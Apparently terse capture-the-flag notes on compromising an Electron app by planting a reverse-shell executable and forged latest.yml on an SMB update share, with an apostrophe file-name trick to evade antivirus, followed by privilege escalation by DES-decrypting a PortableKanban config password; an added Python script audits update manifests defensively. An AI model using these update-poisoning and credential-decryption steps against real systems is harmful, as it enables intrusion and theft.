Electron App (decompile and find secrets!)
auto update feature
Download the setup zip file with smb/ftp
and extract it ---> plugin folder
1. app-64.7z -> 7z x app-64.7z to extract it.
2. app.asar -> sudo npm install -g asar
asar l app.asar (lists files)
asar ef app.asar main.js (this command extracts a main.js file from the app)
asar e app.asar $(pwd) (extracts the whole archive into the current directory)
Google electron updater RCE exploit.
The apostrophe can evade the AV sig.
modify the exploit
sha512sum rev.exe | awk '{print $1}' | xxd -r -p | base64 -w 0
paste the sha512
smbclient //IP/Software_Updates
put latest.yml
put rev.exe
and set up a nc listener
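
Seen from the side that serves the updates, the sha512sum pipeline above produces the base64 SHA-512 value that latest.yml carries. The following is an added example, not part of the original notes: it audits a latest.yml against the file sitting beside it. The top-level path and sha512 keys, the file names and the allowed-character list are assumptions.

```python
import base64
import hashlib
import re
from pathlib import Path

# Assumption: legitimate installer names use only these characters.
SAFE_NAME = re.compile(r"^[A-Za-z0-9._ -]+$")

def sha512_b64(data: bytes) -> str:
    """Same value as: sha512sum FILE | awk '{print $1}' | xxd -r -p | base64 -w 0"""
    return base64.b64encode(hashlib.sha512(data).digest()).decode()

def parse_manifest(text: str) -> dict:
    """Read the top-level path: and sha512: keys (not a full YAML parser)."""
    fields = {}
    for line in text.splitlines():
        m = re.match(r"^(path|sha512):\s*(.*?)\s*$", line)
        if m:
            fields[m.group(1)] = m.group(2)
    return fields

def audit_manifest(text: str, update_dir) -> list:
    """Return a list of findings; an empty list means nothing was flagged."""
    fields = parse_manifest(text)
    name, digest = fields.get("path"), fields.get("sha512")
    if not name or not digest:
        return ["manifest lacks path or sha512"]
    if not SAFE_NAME.match(name) or ".." in name:
        # Stop here: never touch the filesystem with an untrusted name.
        return [f"unexpected characters in path: {name!r}"]
    findings = []
    target = Path(update_dir) / name
    if not target.is_file():
        findings.append(f"{name} not found next to the manifest")
    elif sha512_b64(target.read_bytes()) != digest:
        findings.append(f"sha512 mismatch for {name}")
    return findings

if __name__ == "__main__":
    import tempfile
    with tempfile.TemporaryDirectory() as d:  # constructed sample data
        payload = b"constructed installer bytes"
        (Path(d) / "setup.exe").write_bytes(payload)
        good = f"version: 1.0.1\npath: setup.exe\nsha512: {sha512_b64(payload)}\n"
        print(audit_manifest(good, d))                                   # clean
        print(audit_manifest(good.replace("setup.exe", "s'etup.exe"), d))  # flagged
```

A matching hash only shows that the manifest and the file agree; anyone who can write both to the share can make them agree, so the file-name check and the permissions on the update share are what carry the weight.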
///
Priv Esc:
PortableKanban
Portablekanban.config
Read the config and see the Dbport & DbEncpassword
go to the CyberChef website and decrypt the pass.
copy the enc pass and select the From Base64 option
copy the DES key.
drag and drop decrypt DES key (
it uses redis
decrypt the pass with the same config on CyberChef.